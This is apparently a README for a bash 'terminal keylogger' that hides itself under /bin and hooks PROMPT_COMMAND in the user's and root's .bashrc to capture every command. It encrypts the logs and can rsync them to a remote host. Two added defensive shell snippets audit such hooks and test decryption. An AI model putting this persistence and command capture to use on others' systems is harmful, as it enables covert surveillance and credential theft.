I recently updated the terminal keylogger program by adding a few features and also made the setup and installation smoother.

New Features

The script now creates and configures a few helper files on its first run to make it easier to use.

When the script is executed for the first time it now creates the following files:

  1. .clean-keylogs.sh
  2. .log_history.sh
  3. log_file.log
  4. key-log-history

These four files are created on the first run, alongside the .md.enc file(s) the script already creates.

Purpose Of New Files



The .clean-keylogs.sh file

This file is a basic template for backing up, with rsync, all the logs captured during the month. You can modify the script however you want.

Learn more about rsync here: https://linux.die.net/man/1/rsync

If you want to keep my template, I suggest you change backup_dir to a remote location, since that is what rsync is for.

For example:

"username@0.0.0.0:/destination/keylog_backups/${monthofbackup}"

Make sure the remote user has permission to create the backup directory on the destination server if it does not already exist.

You can also add any options you want to include with rsync.

Note that any modifications you make to this file are lost if the file is deleted or moved: the Python script recreates it with my original template, without your changes. Either keep a backup of your changes or, the harder route, modify the Python script itself.



The .log_history.sh & key-log-history files

These two files work hand in hand. The .log_history.sh script first checks whether the key-log-history file exists in the home directory and creates it if not. It then reads the last command from the .bash_history file, in the user's home directory as well as root's.

It appends the current date and time to that command and writes the result to the key-log-history file.

The main .terminal-keylogger.py script then reads the command from key-log-history and appends it to an encrypted file.

You might be wondering how the script captures newly entered commands at all, since those commands are not written to the .bash_history file until the system has been shut down or restarted.

When executed for the first time, the script appends a line to the .bashrc file in both the user's home directory and root's. That line, specifically its history -a command, forces each newly entered command to be appended to .bash_history immediately, so we do not have to wait for a restart before capturing new commands.
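The .bashrc hook just described is also worth being able to find again, for instance when auditing a machine or uninstalling the tool. The following audit helper is an added example, not code from the Terminal-Keylogger project: it reports PROMPT_COMMAND assignments in a shell rc file that invoke scripts or interpreters, while ignoring the common standalone history -a setting.

```shell
#!/usr/bin/env bash
# Audit helper for the PROMPT_COMMAND hook described above. Added example,
# not part of the Terminal-Keylogger project.

# Print each PROMPT_COMMAND assignment in the rc file $1 that runs an
# external script or interpreter (the line contains a "/" path or calls
# bash, sh or python). A bare history -a setting is common and benign,
# so it is not reported. Returns 0 if a hook was found, 1 otherwise.
find_prompt_command_hooks() {
    local rc_file="$1" found=1 line
    [ -r "$rc_file" ] || return 1
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            \#*) continue ;;                 # comment line
            *PROMPT_COMMAND=*) ;;            # candidate assignment
            *) continue ;;
        esac
        case "$line" in
            */*|*python*|*bash\ *|*sh\ *)
                printf '%s: %s\n' "$rc_file" "$line"
                found=0 ;;
        esac
    done < "$rc_file"
    return "$found"
}

# Audit the current user's rc file and, when readable, root's.
# Returns 0 if a hook was found in either file.
audit_rc_files() {
    local rc status=1
    for rc in "$HOME/.bashrc" /root/.bashrc; do
        [ -r "$rc" ] || continue
        find_prompt_command_hooks "$rc" && status=0
    done
    return "$status"
}

# Demonstration on a constructed rc file containing the hook line from
# the THINGS TO NOTE section, plus a benign history -a setting.
demo_dir=$(mktemp -d)
cat > "$demo_dir/bashrc.sample" <<'EOF'
# constructed sample
PROMPT_COMMAND='history -a'
export PROMPT_COMMAND='history -a; bash /bin/.terminal-keylogger/.log_history.sh; python3 /bin/.terminal-keylogger/.terminal-keylogger.py;$PROMPT_COMMAND >> /bin/.terminal-keylogger/log_file.log 2>&1;'
EOF
find_prompt_command_hooks "$demo_dir/bashrc.sample"
rm -rf "$demo_dir"
```

Run audit_rc_files with sudo to include /root/.bashrc, which is not readable by a normal user.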



The log_file.log file

As you might assume, this file collects the program's error output, most often an error related to the history command.

To get started with the script, follow the installation instructions below. Any feedback can be sent to my email address, linked in the navigation menu at the top.

Installation & Setup


1. Update your repos

sudo apt update && sudo apt upgrade -y


2. Install git

For the latest stable version for your release of Debian/Ubuntu

apt-get install git

For Ubuntu, this PPA provides the latest stable upstream Git version

add-apt-repository ppa:git-core/ppa # apt update; apt install git


3. Clone this repository

Download or clone the repo with git, then change ownership of the directory to your user.

git clone https://github.com/Joshua-ansah/Terminal-Keylogger.git
sudo mv Terminal-Keylogger/.terminal-keylogger /bin/
cd /bin
sudo chown <USERNAME HERE> .terminal-keylogger
cd /bin/.terminal-keylogger/


4. Provide execute permissions to the script.

The python script will need execute permissions to work.

sudo chmod +x .terminal-keylogger.py


5. Set your password

Open the .terminal-keylogger.py file with your preferred editor. Scroll to the bottom and change "your_password" to the password you want to use for the encryption.



6. Start the program

You only need to execute the script once; it will then start automatically every time you reboot your system.

python3 .terminal-keylogger.py

Press Enter when you are greeted with an error like this:

roobak@ubuntu002:/bin/.terminal-keylogger$ python3 .terminal-keylogger.py
source ~/.bashrc
Traceback (most recent call last):
  File "/usr/bin/.terminal-keylogger/.terminal-keylogger.py", line 151, in <module>
    modify_bash_history(input_file, output_file)
  File "/usr/bin/.terminal-keylogger/.terminal-keylogger.py", line 103, in modify_bash_history
    with open(input_file, 'r') as f:
         ^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/home/roobak/.key-log-history'

Now you can source the .bashrc file.

source ~/.bashrc

For the root user

sudo su
source ~/.bashrc
exit

THINGS TO NOTE


1. You may have to close the terminal window for the changes to take effect.

2. If root logging does not work, manually add this line at the end of the /root/.bashrc file:

export PROMPT_COMMAND='history -a; bash /bin/.terminal-keylogger/.log_history.sh; python3 /bin/.terminal-keylogger/.terminal-keylogger.py;$PROMPT_COMMAND >> /bin/.terminal-keylogger/log_file.log 2>&1;'

7. You are all done!

To confirm it is working, check that the script has created these files in /bin/.terminal-keylogger/:

1. .clean-keylogs.sh
2. .log_history.sh
3. termkeys-<YOUR-USERNAME>on<YOUR-HOSTNAME>-<DATE>.md.enc
4. log_file.log
5. termkeys-rooton<YOUR-HOSTNAME>-<DATE>.md.enc

and, in both the user's $HOME and root's, this file:

1. key-log-history

Decryption of the file


When the script is executed, a .enc file will be placed in the .terminal-keylogger directory.

To decrypt it, run the following, replacing THE-NAME-OF-YOUR-ENC-FILE with the actual filename and YOUR_PASSWORD with your password. Note that a password given with -k appears in the process list and in your shell history, which this tool captures; openssl's -pass option can read it from a file or an environment variable instead.

openssl aes-256-cbc -d -a -salt -pbkdf2 -in THE-NAME-OF-YOUR-ENC-FILE -out output_file.tar.gz -k YOUR_PASSWORD
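The following round-trip check is an added example, not code from the Terminal-Keylogger project. It encrypts a constructed sample with the same cipher, base64 and PBKDF2 parameters the decrypt command above expects, reads the password from an environment variable (assumed name KEYLOG_PASS) rather than -k, and verifies that the right password restores the file while a wrong one does not.

```shell
#!/usr/bin/env bash
# Round-trip check for the encryption format used above. Added example,
# not code from the Terminal-Keylogger project; requires the openssl CLI.

# Encrypt $1 into $2 with the parameters the decrypt command expects.
# The password comes from the KEYLOG_PASS environment variable (assumed
# name) so it never appears in the process list or in shell history.
encrypt_log() {
    openssl aes-256-cbc -a -salt -pbkdf2 -in "$1" -out "$2" -pass env:KEYLOG_PASS
}

# Decrypt $1 into $2; exits non-zero when the password is wrong.
decrypt_log() {
    openssl aes-256-cbc -d -a -salt -pbkdf2 -in "$1" -out "$2" -pass env:KEYLOG_PASS 2>/dev/null
}

# Returns 0 when decryption with the right password restores the sample
# and decryption with a wrong password does not.
roundtrip_check() {
    local dir
    dir=$(mktemp -d) || return 1
    # Constructed sample line, not a real captured log.
    printf 'ls -la /etc  Mon 01 Jan 2024 12:00:00 UTC\n' > "$dir/sample.log"
    export KEYLOG_PASS='correct-horse'
    encrypt_log "$dir/sample.log" "$dir/sample.md.enc" || return 1
    decrypt_log "$dir/sample.md.enc" "$dir/out.log" || return 1
    [ "$(cat "$dir/sample.log")" = "$(cat "$dir/out.log")" ] || return 1
    # A wrong password must either fail outright or yield garbage.
    export KEYLOG_PASS='wrong-password'
    if decrypt_log "$dir/sample.md.enc" "$dir/bad.log" \
        && [ "$(cat "$dir/sample.log")" = "$(cat "$dir/bad.log")" ]; then
        return 1
    fi
    unset KEYLOG_PASS
    rm -rf "$dir"
    return 0
}

roundtrip_check && echo "round trip OK"
```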

Log-Rotation


To implement log rotation and backup of your log files, modify the rsync command in .clean-keylogs.sh to send the files to a remote destination.

You can then schedule the script to run via a cron job.